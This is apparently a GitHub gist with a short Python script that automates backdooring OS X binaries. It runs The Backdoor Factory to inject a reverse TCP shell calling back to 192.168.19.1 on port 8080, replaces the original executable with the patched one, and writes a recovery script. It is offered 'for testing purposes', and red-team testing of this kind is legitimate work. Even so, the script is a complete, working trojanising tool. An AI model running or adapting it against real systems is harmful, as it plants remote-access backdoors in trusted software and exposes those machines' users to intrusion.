Created
February 5, 2015 14:09
-
-
Save secretsquirrel/120f511775d57e76d633 to your computer and use it in GitHub Desktop.
Script to automate the patching of binaries on OS X for testing purposes (Normal reverse tcp payload)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| !/usr/bin/env python | |
| import sys | |
| import os | |
| import shutil | |
| import time | |
| if os.uname()[1] == 'MyHostName': # Change This to YOUR MASTER HOSTNAME | |
| print 'NOPE NOPE NOPE' | |
| sys.exit() | |
| if len(sys.argv) != 2: | |
| print "Usage: ", sys.argv[0], "FILE_TO_PATCH" | |
| sys.exit() | |
| if os.getuid() != 0: | |
| print "Run as root" | |
| sys.exit() | |
| os.chdir('/Users/test/the-backdoor-factory') | |
| shutil.copy(str(sys.argv[1]), ".") | |
| cmdToRun = "./backdoor.py -f " + str(os.path.basename(str(sys.argv[1]))) + " -s reverse_shell_tcp -P 8080 -H 192.168.19.1 -q -F ALL" | |
| print cmdToRun | |
| os.system(cmdToRun) | |
| time.sleep(1) | |
| copycmd = "backdoored/" + os.path.basename(str(sys.argv[1])) | |
| print "Copying:", copycmd, 'to:', str(sys.argv[1]) | |
| time.sleep(2) | |
| shutil.copy(copycmd, str(sys.argv[1])) | |
| with open('recovery.sh', 'w') as f: | |
| recover_cmd = '#!/bin/bash\n' + '../knockknock/knockknock.py\n' | |
| recover_cmd += 'cp ' + os.path.basename(str(sys.argv[1])) + ' ' + str(sys.argv[1]) + '\ncodesign --verify -v ' + str(sys.argv[1]) + '\n' | |
| f.write(recover_cmd) | |
| os.system('chmod +x recovery.sh') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment